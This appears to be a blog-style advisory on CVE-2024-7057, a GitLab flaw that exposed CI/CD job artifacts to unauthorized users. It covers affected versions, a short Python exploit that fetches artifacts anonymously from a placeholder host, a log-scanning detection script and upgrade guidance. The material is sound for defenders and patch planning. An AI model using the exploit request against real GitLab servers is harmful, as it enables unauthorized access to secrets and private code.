CVE-2024-7057 is a recently disclosed information disclosure vulnerability affecting GitLab Community Edition (CE) and Enterprise Edition (EE). It allows unauthorized users to access CI/CD job artifacts, which may contain sensitive information such as logs, compiled binaries, secrets, and more. It affects GitLab versions from 16.7 onward, up to the fixed releases 17.0.5, 17.1.3, and 17.2.1 in the 17.0, 17.1, and 17.2 branches respectively.

In this post, we’ll explain what this vulnerability is, how it works, show you an example of exploiting it, link to original sources, and provide remediation guidance. This article is written in a simple style for broad understanding.

What Is CVE-2024-7057?

CVE-2024-7057 is an information disclosure vulnerability in GitLab. In simple terms: it allows users with insufficient permissions—users who should NOT have access—to view and download job artifacts generated by CI/CD pipelines. Artifacts can include test results, build logs, compiled applications, or other sensitive data generated during automated jobs.

Why Is This a Problem?

Job artifacts often contain valuable or sensitive information. If exposed, malicious users or curious attackers can use these to learn about project internals, gain access to confidential code, or even discover further vulnerabilities.

Affected versions:

- 16.7 up to (but not including) 17.0.5
- 17.1 up to (but not including) 17.1.3
- 17.2 up to (but not including) 17.2.1

If you are running any GitLab release in these version ranges, you are vulnerable.

How Does the Vulnerability Work?

Normally, GitLab uses Access Control Lists (ACLs) and permissions to restrict who can view CI/CD job artifacts. Due to a bug, artifacts could be retrieved even by users who do not have the authorization.

What Actually Happened?

- Flawed Permissions Check: The permission logic failed to correctly check if the user had the right role before allowing them to access artifacts for certain jobs or projects.
- Direct URL Access: By crafting a proper HTTP GET request for a known artifact URL, a low-privilege user (or even a guest, in some cases) could download the job artifact without approval.

Practical Exploit Example

Below is an example scenario using Python that demonstrates how an unauthorized user could exploit this flaw to download artifacts.

- The attacker knows or can infer the project ID and a job ID with interesting artifacts.
- The vulnerable GitLab server is running (for example) at https://gitlab.example.com.

Exploit Code Snippet

```python
import requests

# Target GitLab instance URL and known job artifact IDs
GITLAB_URL = 'https://gitlab.example.com'
PROJECT_ID = 123  # Replace with actual project ID
JOB_ID = 456      # Replace with actual job ID

# Unprivileged user's session (no or limited permissions)
session = requests.Session()
# For an anonymous attack, don't authenticate

# Construct the artifact download URL (the REST API endpoint for a job's artifact archive)
artifact_url = f"{GITLAB_URL}/api/v4/projects/{PROJECT_ID}/jobs/{JOB_ID}/artifacts"

# A timeout keeps the script from hanging on an unresponsive host
response = session.get(artifact_url, timeout=30)

if response.status_code == 200:
    # Artifact downloaded successfully: the API returns the artifact archive as a ZIP
    with open('artifact.zip', 'wb') as file:
        file.write(response.content)
    print('Artifact was downloaded without proper authorization!')
else:
    print(f"Failed to download: status code {response.status_code}")
```

Note: This script simply retrieves the artifact as a ZIP file. On properly secured GitLab versions, unauthorized requests would return a 403 Forbidden.
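The defender's side of the same request pattern, as an added example that is not part of the original post: a sweep over GitLab API log lines (constructed here; the field names method, path, status, username and remote_ip are assumed) that flags successful artifact downloads with no signed-in user and counts them per source address.

```python
import json
import re
from collections import defaultdict

# Artifact download routes to watch: the REST API route used in the snippet above
# and the equivalent web UI route; the job ID is captured for reporting.
ARTIFACT_RE = re.compile(
    r"^(?:/api/v4/projects/\d+/jobs/(?P<api_job>\d+)/artifacts"
    r"|/[^?]+/-/jobs/(?P<web_job>\d+)/artifacts)"
)

# Constructed sample lines in the shape of GitLab's api_json.log (field names
# method, path, status, username and remote_ip are assumed for this example).
SAMPLE_LOG = """\
{"method":"GET","path":"/api/v4/projects/123/jobs/456/artifacts","status":200,"username":null,"remote_ip":"203.0.113.7"}
{"method":"GET","path":"/api/v4/projects/123/jobs/457/artifacts","status":200,"username":null,"remote_ip":"203.0.113.7"}
{"method":"GET","path":"/grp/app/-/jobs/458/artifacts/download","status":200,"username":null,"remote_ip":"203.0.113.7"}
{"method":"GET","path":"/api/v4/projects/123/jobs/456/artifacts","status":200,"username":"alice","remote_ip":"198.51.100.2"}
{"method":"GET","path":"/api/v4/projects/123/jobs/999/artifacts","status":404,"username":null,"remote_ip":"192.0.2.9"}
{"method":"GET","path":"/api/v4/projects/123/pipelines","status":200,"username":null,"remote_ip":"203.0.113.7"}
not json at all
"""

def find_anonymous_artifact_downloads(log_text):
    """Return (remote_ip, job_id) for successful artifact downloads with no signed-in user."""
    hits = []
    for line in log_text.splitlines():
        try:
            entry = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip malformed lines instead of aborting the sweep
        if entry.get("method") != "GET" or entry.get("status") != 200:
            continue
        if entry.get("username"):
            continue  # signed-in user: verify project membership separately
        match = ARTIFACT_RE.match(entry.get("path", ""))
        if match:
            job_id = match.group("api_job") or match.group("web_job")
            hits.append((entry.get("remote_ip"), job_id))
    return hits

def downloads_per_ip(hits):
    """Count flagged downloads per source address; many jobs from one IP is the signal."""
    counts = defaultdict(int)
    for ip, _ in hits:
        counts[ip] += 1
    return dict(counts)

if __name__ == "__main__":
    print(downloads_per_ip(find_anonymous_artifact_downloads(SAMPLE_LOG)))
```

Authenticated downloads are deliberately not flagged here; those need a separate check of the user's project membership against the project the job belongs to.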

Remediation

1. Upgrade GitLab! Immediate action: upgrade to 17.0.5, 17.1.3, or 17.2.1 (or later), depending on the minor release you run. 👉 See GitLab Security Releases June 2024 for direct links.
2. Review your artifact storage: check for public artifacts.
   - Restrict pipeline logs and artifacts: update your .gitlab-ci.yml to store only essential data as artifacts and restrict their exposure.
3. Audit user roles and permissions frequently.
   - Remove unnecessary access for users, especially on public/open-source projects.

References

- GitLab Security Advisory - CVE-2024-7057
- CVE Record - CVE-2024-7057
- GitLab Release Blog
- SecLists.org Entry

Final Thoughts

CVE-2024-7057 underscores the importance of regular updates and careful security reviews for your DevOps pipelines. Even seemingly harmless artifacts can be goldmines for attackers. If your team uses GitLab, please patch now.

*Stay safe, and always keep your dependencies up to date!*

Timeline

Published on: 07/25/2024 01:15:10 UTC
Last modified on: 07/26/2024 15:55:10 UTC